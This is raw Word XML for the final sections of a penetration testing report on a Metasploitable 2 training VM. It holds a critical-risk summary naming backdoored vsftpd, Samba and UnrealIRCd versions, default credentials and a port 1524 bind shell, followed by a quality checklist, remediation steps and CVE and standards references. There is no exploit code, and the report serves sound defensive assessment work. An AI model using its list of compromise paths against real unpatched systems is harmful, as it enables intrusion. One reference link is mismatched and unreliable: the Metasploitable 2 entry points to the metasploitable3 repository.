          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The target presents multiple independent paths to full system compromise through a combination of:</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Unpatched software with known Critical-severity CVEs (vsftpd 2.3.4, Samba 3.0.20, UnrealIRCd 3.2.8.1)</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Default or trivially guessable credentials (PostgreSQL, Tomcat Manager, MySQL)</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Insecure legacy services with no encryption (Telnet, rlogin, rsh, rexec)</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Intentional backdoors and bind shells (port 1524) inherent to the Metasploitable 2 training image</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Excessive service exposure with an attack surface comprising 23+ open TCP ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Whilst this host is a deliberately configured training virtual machine, the vulnerabilities observed are representative of real-world misconfigurations found in unpatched, unmaintained, or legacy production systems. The findings serve as a compelling demonstration of why timely patching, service hardening, and network segmentation are essential security controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3  Project Quality Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 19: Assessment Quality Checklist</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Target and testing scope clearly documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Nmap scan results and supporting screenshots included</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Potential vulnerabilities distinguished from confirmed findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Evidence of Samba and PostgreSQL sessions included</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Failed Tomcat attempt accurately documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Remediation actions prioritised and explained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Follow-up scan or validation plan included</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Included in Recommendations (Section 8.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Methodology aligned with PTES, OWASP, NIST SP 800-115</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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CVSS scores assigned using NVD / CVE references where available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2027"/>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 Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.4  Next Steps</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Implement the Critical and High priority remediation recommendations immediately (within 24–48 hours and 7 days respectively)</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Conduct a follow-up vulnerability scan after remediation to verify that Critical and High findings have been addressed</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Schedule a re-test engagement within 60–90 days to validate the effectiveness of all remediation actions</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Evaluate the need for a broader network assessment if additional hosts operate within the same network segment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement ongoing monitoring, patch management, and a regular penetration testing cadence as described in Section 8.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 20: References and External Resources</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">URL / Publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE-2011-2523 — vsftpd 2.3.4 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://nvd.nist.gov/vuln/detail/CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE-2007-2447 — Samba usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://nvd.nist.gov/vuln/detail/CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE-2010-2075 — UnrealIRCd 3.2.8.1 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://nvd.nist.gov/vuln/detail/CVE-2010-2075</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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PTES — Penetration Testing Execution Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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http://www.pentest-standard.org/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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OWASP Testing Guide (OTG)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://owasp.org/www-project-web-security-testing-guide/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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NIST SP 800-115 — Technical Guide to Information Security Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://csrc.nist.gov/publications/detail/sp/800-115/final</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVSS v3.1 Specification Document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://www.first.org/cvss/v3.1/specification-document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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NIST National Vulnerability Database (NVD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://nvd.nist.gov/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Metasploit Framework — Rapid7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://www.metasploit.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Nmap — Network Mapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://nmap.org/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Metasploitable 2 (Rapid7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://github.com/rapid7/metasploitable3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CWE-312 — Cleartext Storage of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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https://cwe.mitre.org/data/definitions/312.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>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CWE-306 — Missing Authentication for Critical Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="FFFFFF"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https://cwe.mitre.org/data/definitions/306.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>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Kali Linux Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">https://www.kali.org/docs/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All CVE references are sourced from the NIST National Vulnerability Database (NVD) and the MITRE CVE programme. CVSS 3.1 base scores are as published by NVD. All URLs were valid at the time of report preparation (October 2025).</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="11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2"/>
      </w:pBdr>
      <w:spacing w:after="0" w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="false"/>
        <w:bCs w:val="false"/>
        <w:i w:val="false"/>
        <w:iCs w:val="false"/>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Delta Steel Penetration Testing Report  |  October 2025  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="false"/>
        <w:bCs w:val="false"/>
        <w:i w:val="false"/>
        <w:iCs w:val="false"/>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2"/>
      </w:pBdr>
      <w:spacing w:after="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="false"/>
        <w:bCs w:val="false"/>
        <w:i w:val="false"/>
        <w:iCs w:val="false"/>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Delta Steel — Penetration Testing Assessment Report</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bCs/>
        <w:i w:val="false"/>
        <w:iCs w:val="false"/>
        <w:color w:val="C0000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acd611df3ea20467c6756da9c3e24e613d737a5f.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/388052d4d7f373b098c5febdf62b2067f75a0b7a.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a012f26a004fafb913d7efd72a3001fc28d40f63.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e93cb3b75a2ba8f4ce27a68aa8669092921cd33c.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a0d661bb7e8f94e22698ef6e728732859a2a2731.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a1dc9da4ddc4a4748765af3b4bae544e5d95c0db.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2026-10-24T10:14:29.325Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-24T10:14:29.330Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>